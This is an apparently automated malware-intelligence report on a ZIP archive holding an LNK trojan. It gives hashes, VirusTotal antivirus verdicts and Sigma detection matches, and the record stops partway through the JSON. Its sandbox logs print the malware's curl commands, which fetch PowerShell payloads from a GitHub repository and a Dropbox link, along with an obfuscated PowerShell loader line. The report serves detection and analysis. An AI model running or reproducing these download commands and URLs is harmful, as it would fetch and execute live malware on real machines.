bd17b8b10675031cec05c0cd8a001fac
Hash
- MD5: bd17b8b10675031cec05c0cd8a001fac
- SHA1: 88882f006ce9d3a61dba9b5eeb50f2cb60155d11
- SHA256: 7832dcef8aded30ec042410c10f78f798d1ec218fe86d1068ae0ebedbe1b37d4
- First Seen: 2026-05-13
- Last Seen: 2026-05-13
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "7832dcef8aded30ec042410c10f78f798d1ec218fe86d1068ae0ebedbe1b37d4",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/7832dcef8aded30ec042410c10f78f798d1ec218fe86d1068ae0ebedbe1b37d4"
},
"attributes": {
"last_analysis_date": 1778805938,
"tlsh": "T11CC2F11C70098B75E0AC37F64988F764F14AAA89B2B7C1AE381CEB0E438F5164455DEE",
"unique_sources": 1,
"crowdsourced_ids_stats": {
"high": 0,
"medium": 0,
"low": 0,
"info": 1
},
"crowdsourced_ids_results": [
{
"rule_category": "Potential Corporate Privacy Violation",
"alert_severity": "info",
"rule_msg": "ET POLICY Dropbox.com Offsite File Backup in Use",
"rule_id": "1:2012647",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert tls [108.160.162.0/20,162.125.0.0/16,192.189.200.0/23,199.47.216.0/22,205.189.0.0/24,209.99.70.0/24,45.58.64.0/20] 443 -> $HOME_NET any (msg:\"ET POLICY Dropbox.com Offsite File Backup in Use\"; flow:established,to_client; tls.cert_subject; content:\"CN=*.dropbox.com\"; fast_pattern; threshold: type limit, count 1, seconds 300, track by_src; reference:url,www.dropbox.com; reference:url,dereknewton.com/2011/04/dropbox-authentication-static-host-ids/; classtype:policy-violation; sid:2012647; rev:7; metadata:created_at 2011_04_07, confidence High, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_03_25;)",
"rule_references": [
"https://www.dropbox.com",
"https://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/"
],
"alert_context": [
{
"src_ip": "162.125.8.18",
"src_port": 443,
"ja3": [
"3b5074b1b5d032e5620f69f9f700ff0e"
],
"ja3s": [
"b44baa8a20901c5663b3a9664ba8a767"
]
}
]
}
],
"sha256": "7832dcef8aded30ec042410c10f78f798d1ec218fe86d1068ae0ebedbe1b37d4",
"first_seen_itw_date": 1773830623,
"reputation": 0,
"trid": [
{
"file_type": "ZIP compressed archive",
"probability": 100.0
}
],
"type_tags": [
"compressed",
"zip"
],
"names": [],
"magika": "ZIP",
"md5": "bd17b8b10675031cec05c0cd8a001fac",
"size": 27336,
"ssdeep": "768:StQJGn3blyje2S03SLB3BkTXNRXZhecvm:in3Jya2S0CB3BkDNJfecvm",
"type_tag": "zip",
"bundle_info": {
"highest_datetime": "2026-03-08 18:20:42",
"lowest_datetime": "2026-03-08 18:20:42",
"num_children": 1,
"extensions": {
"lnk": 1
},
"file_types": {
"unknown": 1
},
"type": "ZIP",
"uncompressed_size": 155896
},
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 5,
"medium": 7,
"low": 2
}
},
"popular_threat_classification": {
"suggested_threat_label": "trojan.pantera/jaci",
"popular_threat_category": [
{
"value": "trojan",
"count": 21
},
{
"value": "worm",
"count": 2
}
],
"popular_threat_name": [
{
"value": "pantera",
"count": 8
},
{
"value": "jaci",
"count": 2
},
{
"value": "lnkexec",
"count": 2
}
]
},
"last_modification_date": 1778813158,
"times_submitted": 1,
"vhash": "e4821e50670408d46885fc364e2b7227",
"sha1": "88882f006ce9d3a61dba9b5eeb50f2cb60155d11",
"tags": [
"detect-debug-environment",
"long-sleeps",
"zip"
],
"sigma_analysis_stats": {
"critical": 0,
"high": 5,
"medium": 7,
"low": 2
},
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan.ZIP.Pantera.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260514",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.D7A6EA0A"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260514",
"category": "malicious",
"result": "Script.Trojan.50708.GC"
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan-JACI!BA8E682A72C6"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan.Agent.LNK.Gen"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.235",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5602",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260511",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20230417",
"category": "undetected",
"result": null
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260514",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.D7A6EA0A"
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.52.59509",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.52.59509",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260514",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.D7A6EA0A [many]"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "24c6121:24c6121:d2db211:d2db211",
"engine_update": "20260514",
"category": "malicious",
"result": "TrojanDownloader/LNK.Starter.a"
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1207",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan.Gen.NPE"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260514",
"category": "malicious",
"result": "LNK/Agent.AMP trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260514",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260514",
"category": "malicious",
"result": "LNK:Agent-EW [Trj]"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260514",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260514",
"category": "malicious",
"result": "HEUR:Trojan.Multi.Powecod.a"
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "malicious",
"result": "Trojan:Package/phishing.7"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan.PSRunner/LNK!1.BADE (CLASSIC)"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260514",
"category": "malicious",
"result": "Troj/LnkObf-AH"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan.TR/LNK.Agent.EW"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260514",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.D7A6EA0A"
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260514",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14532",
"engine_update": "20260515",
"category": "malicious",
"result": "ti!7832DCEF8ADE"
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260515",
"category": "malicious",
"result": "zip.trojan.pantera"
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260514",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.D7A6EA0A (B)"
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan.LNK.Agent"
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260514-00",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260512",
"category": "undetected",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1778799645",
"engine_update": "20260515",
"category": "malicious",
"result": "Detected"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260514",
"category": "malicious",
"result": "HIDDENEXT/Worm.Gen"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.245.174",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38647",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26030.3008",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan:Win32/Egairtigado!rfn"
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.24-114820894",
"engine_update": "20260514",
"category": "malicious",
"result": "Troj/LnkObf-AH"
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44547AVA:64.31245",
"engine_update": "20260515",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.D7A6EA0A"
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260514",
"category": "malicious",
"result": "ABTrojan.IHSB-"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan/LNK.Agent.SC310378"
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.6.1",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan.Link.CmdRunner"
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-05-14.02",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260515",
"category": "malicious",
"result": "Win32.Trojan.Powecod.Qqil"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260514",
"category": "malicious",
"result": "Trojan-JACI!BA8E682A72C6"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.30.0",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260514",
"category": "malicious",
"result": "LNK:Agent-EW [Trj]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260514",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Worm:Multi/Wacatac.B9nj"
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260515",
"category": "failure",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20251216",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": null,
"engine_update": "20260515",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260512",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.778",
"engine_update": "20260513",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260515",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260504",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260514",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.261",
"engine_update": "20260513",
"category": "type-unsupported",
"result": null
}
},
"sandbox_verdicts": {
"Zenbox": {
"category": "malicious",
"malware_classification": [
"MALWARE",
"TROJAN",
"EVADER",
"RAT"
],
"sandbox_name": "Zenbox",
"malware_names": [
"ROKRAT"
],
"confidence": 100
}
},
"magic": "Zip archive data, at least v2.0 to extract, compression method=deflate",
"filecondis": {
"raw_md5": "e967389d250257e928543e2354863b75",
"dhash": "3030303000002000"
},
"type_description": "ZIP",
"last_analysis_stats": {
"malicious": 38,
"suspicious": 0,
"undetected": 27,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 1,
"type-unsupported": 9
},
"type_extension": "zip",
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "09fa8f2c3e86f0fa6cc0876e94d77a20c07409a7154a61ef64a9a9a31a6d0049",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious File Download From File Sharing Domain Via Curl.EXE",
"rule_description": "Detects potentially suspicious file download from file sharing domains using curl.exe",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"FileVersion": "7.55.1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "high",
"rule_id": "8d980d509aaf7ca8f2c6cd9dd23e8ea6eb18328ca64711cb6e059ecec024fe0a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Outbound Network Connection Initiated By Script Interpreter",
"rule_description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.",
"rule_author": "frack113, Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "443",
"Initiated": "true",
"Protocol": "tcp",
"SourceIp": "192.168.122.103",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\SysWOW64\\WScript.exe",
"SourcePort": "49708",
"DestinationIp": "185.199.109.133"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "443",
"DestinationIp": "185.199.109.133",
"Protocol": "tcp",
"SourceIp": "172.16.1.2",
"DestinationIsIpv6": "false",
"EventID": "3",
"SourcePort": "56601",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"Initiated": "true"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "80",
"DestinationIp": "104.18.21.213",
"Protocol": "tcp",
"SourceIp": "172.16.1.2",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"SourcePort": "56602",
"Initiated": "true"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "443",
"Initiated": "true",
"Protocol": "tcp",
"SourceIp": "172.16.1.9",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"SourcePort": "63637",
"DestinationIp": "185.199.108.133"
}
},
{
"values": {
"SourceIsIpv6": "false",
"DestinationPort": "80",
"DestinationIp": "104.18.20.213",
"Protocol": "tcp",
"SourceIp": "172.16.1.9",
"DestinationIsIpv6": "false",
"EventID": "3",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"SourcePort": "63638",
"Initiated": "true"
}
}
]
},
{
"rule_level": "high",
"rule_id": "d86dfee683d0e96803dc8a153d15f7208afc774045e2d885ccaec10bdcef7831",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Curl.EXE Download",
"rule_description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=F64457B2255A6BB2224EED25A0954B5274EC62D7,MD5=05DEDF1936A065612E52C37E40143646,SHA256=664BB48BF3E8A7D7036E4B0029FA10E1A90C2562AD9A09A885650408D00DEA1B,IMPHASH=A798305E4231D362ADC62175DEBE3E10",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&st=kn296823&dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "8.0.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://www.dropbox.com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232st=kn296823dl=1\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksref.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\Bruno\\AppData\\Local\\TEMP\\a2d3acd4-6456-4029-8503-6cc4267-1d9b.tmp.bat",
"CommandLine": "curl -k -L \"https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/qdke.ini\" -o C:\\Users\\Bruno\\AppData\\Local\\Eudksre.ps1",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "high",
"rule_id": "e6fdb32f143bba16a3ea06247ced55b7b90f8b5b5c6c26ddb95cdcf23908af8a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Command Line Obfuscation",
"rule_description": "Detects the PowerShell command lines with special characters",
"rule_author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)",
"match_context": [
{
"values": {
"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "e75e9983c2277304aa1294c0b077a3139a8405cd1661ccf513a6c05a002acacf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Base64 Encoded PowerShell Command Detected",
"rule_description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
